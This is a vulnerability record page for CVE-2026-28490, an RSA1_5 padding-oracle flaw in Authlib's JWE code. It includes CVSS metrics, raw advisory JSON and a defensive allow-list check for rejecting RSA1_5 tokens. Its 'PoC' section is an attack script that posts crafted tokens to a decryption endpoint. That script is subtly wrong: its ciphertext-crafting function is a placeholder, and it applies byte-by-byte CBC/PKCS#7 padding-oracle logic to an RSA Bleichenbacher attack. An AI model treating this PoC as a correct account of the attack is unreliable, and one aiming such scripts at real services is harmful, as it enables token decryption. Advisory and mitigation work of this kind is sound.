Security Vulnerability Report
CVE-2026-28490 CVSS 6.5 MEDIUM

CVE-2026-28490

Published: 2026-03-16 18:16:08
Last Modified: 2026-03-17 20:45:46

Description

Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a cryptographic padding oracle vulnerability was identified in the Authlib Python library concerning the implementation of the JSON Web Encryption (JWE) RSA1_5 key management algorithm. Authlib registers RSA1_5 in its default algorithm registry without requiring explicit opt-in, and actively destroys the constant-time Bleichenbacher mitigation that the underlying cryptography library implements correctly. This issue has been patched in version 1.6.9.
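The vulnerability is only reachable if a JWE consumer is willing to perform an RSA1_5 (RSAES-PKCS1-v1_5) key-unwrap, so on an unpatched deployment the cheapest compensating control is to refuse such tokens at the boundary, before any decryption code runs. The following is an added defender-side check, not code from the advisory, from Authlib or from this report: a stdlib-only parser for the compact JWE serialization that decodes the protected header and enforces an explicit algorithm allow-list. The allow-list contents, the function names and the constructed sample tokens are assumptions for illustration.

```python
import base64
import json

# Key-management algorithms this consumer is willing to accept. RSA1_5 is
# deliberately absent: it is the PKCS#1 v1.5 scheme CVE-2026-28490 concerns.
# The list is an editorial assumption, not Authlib's default registry.
ALLOWED_ALG = frozenset({"RSA-OAEP", "RSA-OAEP-256", "dir", "A256KW", "ECDH-ES"})


def b64url_decode(segment: str) -> bytes:
    """Decode an unpadded base64url segment (RFC 7515 section 2)."""
    padding = "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment + padding)


def b64url_encode(data: bytes) -> str:
    """Encode bytes as unpadded base64url."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def parse_protected_header(token: str) -> dict:
    """Split a compact JWE and return its protected header as a dict.

    Compact JWE has exactly five dot-separated segments:
    header.encrypted_key.iv.ciphertext.tag (RFC 7516 section 3.1).
    Only the header is inspected; nothing is decrypted here.
    """
    parts = token.split(".")
    if len(parts) != 5:
        raise ValueError(f"expected 5 JWE segments, got {len(parts)}")
    header = json.loads(b64url_decode(parts[0]))
    if not isinstance(header, dict):
        raise ValueError("protected header is not a JSON object")
    return header


def check_jwe_alg(token: str) -> tuple:
    """Return (accepted, reason).

    The decision is made from the header alone, so an RSA1_5 token never
    reaches a PKCS#1 v1.5 decryption path and cannot exercise the oracle.
    """
    try:
        header = parse_protected_header(token)
    except ValueError as exc:  # covers binascii.Error and JSONDecodeError too
        return False, f"malformed token: {exc}"
    alg = header.get("alg")
    if not isinstance(alg, str):
        return False, "missing alg header"
    if alg not in ALLOWED_ALG:
        return False, f"alg {alg!r} not in allow-list"
    return True, "ok"


def make_sample_token(alg: str) -> str:
    """Constructed sample token: realistic shape, dummy non-decryptable body."""
    header = b64url_encode(json.dumps({"alg": alg, "enc": "A256GCM"}).encode())
    dummy = b64url_encode(b"\x00" * 16)
    return ".".join([header, dummy, dummy, dummy, dummy])


if __name__ == "__main__":
    for alg in ("RSA1_5", "RSA-OAEP-256"):
        accepted, reason = check_jwe_alg(make_sample_token(alg))
        print(f"{alg:13s} accepted={accepted} ({reason})")
    print(check_jwe_alg("not.a.jwe"))
```

Upgrading to 1.6.9 remains the fix; this check is a compensating control for the interim and doubles as a detection point, since logging the rejection reason shows which callers still present RSA1_5 tokens. The same restriction can be applied at library level by constructing Authlib's `JsonWebEncryption` with an explicit `algorithms` list rather than relying on its default registry.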

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:authlib:authlib:*:*:*:*:*:*:*:* - VULNERABLE
Authlib < 1.6.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# CVE-2026-28490 PoC - Padding Oracle Attack on Authlib JWE RSA1_5
# This is a simplified demonstration of the attack concept


def create_crafted_ciphertext(original_ciphertext, target_block):
    """
    Craft a modified ciphertext for oracle testing.
    In real attack, this would be modified to test different padding conditions.
    """
    # Modify the ciphertext to test oracle responses
    modified = bytearray(original_ciphertext)
    modified[0] ^= 0x01  # Flip bits to potentially create valid-looking padding
    return bytes(modified)


def padding_oracle_attack(target_url, encrypted_token):
    """
    Perform padding oracle attack to decrypt JWE RSA1_5 encrypted tokens.

    Args:
        target_url: URL endpoint that decrypts JWE tokens
        encrypted_token: Base64-encoded JWE token

    Returns:
        Decrypted plaintext
    """
    plaintext = b''
    block_size = 256  # RSA-2048 block size

    # For each block, use oracle to recover plaintext
    for block_num in range(get_block_count(encrypted_token)):
        block_ciphertext = extract_block(encrypted_token, block_num)
        recovered_block = b''

        # Oracle-guided decryption (Bleichenbacher style)
        for byte_pos in range(block_size):
            for guess in range(256):
                crafted = craft_ciphertext(block_ciphertext, byte_pos, guess)

                # Send to oracle and check response
                if oracle_check(target_url, crafted):
                    # Valid padding found, extract byte
                    recovered_block += bytes([guess])
                    break

        plaintext += recovered_block

    return unpad_pkcs7(plaintext)


def oracle_check(url, ciphertext):
    """
    Check if the padding oracle accepts the ciphertext.
    Returns True if padding is valid, False otherwise.
    """
    response = requests.post(url, json={'token': ciphertext})

    # Oracle responses that indicate padding validity
    if response.status_code == 200:
        return True
    elif 'padding' in response.text.lower() or 'decrypt' in response.text.lower():
        return False
    else:
        # Invalid padding detected
        return False


def craft_ciphertext(original, position, guess):
    """
    Craft ciphertext for oracle testing at specific byte position.
    Implements the mathematical transformation needed for Bleichenbacher attack.
    """
    # Simplified: In real attack, use RSA mathematical properties
    # to construct ciphertexts that will decrypt to values with specific byte patterns
    return original  # Placeholder for actual implementation


def get_block_count(encrypted_token):
    """Calculate number of RSA blocks in the encrypted token."""
    return len(encrypted_token) // 256


def extract_block(token, block_num):
    """Extract specific RSA block from encrypted token."""
    start = block_num * 256
    return token[start:start + 256]


def unpad_pkcs7(data):
    """Remove PKCS#7 padding from decrypted data."""
    padding_len = data[-1]
    return data[:-padding_len]


# Example vulnerable endpoint
VULNERABLE_ENDPOINT = "https://example.com/api/decrypt"

# Example encrypted JWE token
ENCRYPTED_TOKEN = "eyJhbGciOiJSU0ExIn0..."  # Truncated for example

if __name__ == "__main__":
    print("CVE-2026-28490 - Authlib JWE RSA1_5 Padding Oracle PoC")
    print("=" * 60)
    print("Target: Authlib < 1.6.9 with JWE RSA1_5 algorithm")
    print("Vulnerability: Padding Oracle (Bleichenbacher variant)")
    print("=" * 60)
    # Note: This PoC demonstrates the attack concept
    # Actual implementation requires understanding the specific oracle behavior
    # and proper RSA mathematical transformations
```

References

https://github.com/authlib/authlib/commit/48b345f29f6c459f11c6a40162b6c0b742ef2e22 (Patch)
https://github.com/authlib/authlib/releases/tag/v1.6.9 (Product, Release Notes)
https://github.com/authlib/authlib/security/advisories/GHSA-7432-952r-cw78 (Exploit, Mitigation, Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-28490",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-16T18:16:07.557",
    "lastModified": "2026-03-17T20:45:45.573",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Authlib is a Python library which builds OAuth and OpenID Connect servers. Prior to version 1.6.9, a cryptographic padding oracle vulnerability was identified in the Authlib Python library concerning the implementation of the JSON Web Encryption (JWE) RSA1_5 key management algorithm. Authlib registers RSA1_5 in its default algorithm registry without requiring explicit opt-in, and actively destroys the constant-time Bleichenbacher mitigation that the underlying cryptography library implements correctly. This issue has been patched in version 1.6.9."
      },
      {
        "lang": "es",
        "value": "Authlib es una biblioteca Python que construye servidores OAuth y OpenID Connect. Antes de la versión 1.6.9, se identificó una vulnerabilidad de oráculo de relleno criptográfico en la biblioteca Python Authlib relacionada con la implementación del algoritmo de gestión de claves RSA1_5 de JSON Web Encryption (JWE). Authlib registra RSA1_5 en su registro de algoritmos predeterminado sin requerir una aceptación explícita, y destruye activamente la mitigación de tiempo constante de Bleichenbacher que la biblioteca de criptografía subyacente implementa correctamente. Este problema ha sido parcheado en la versión 1.6.9."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 8.3,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "attackRequirements": "PRESENT",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "LOW",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-203"},
          {"lang": "en", "value": "CWE-327"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:authlib:authlib:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.6.9",
                "matchCriteriaId": "8C677FEC-2094-49D8-ABAB-F740B6F83D38"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/authlib/authlib/commit/48b345f29f6c459f11c6a40162b6c0b742ef2e22",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/authlib/authlib/releases/tag/v1.6.9",
        "source": "[email protected]",
        "tags": ["Product", "Release Notes"]
      },
      {
        "url": "https://github.com/authlib/authlib/security/advisories/GHSA-7432-952r-cw78",
        "source": "[email protected]",
        "tags": ["Exploit", "Mitigation", "Vendor Advisory"]
      }
    ]
  }
}
```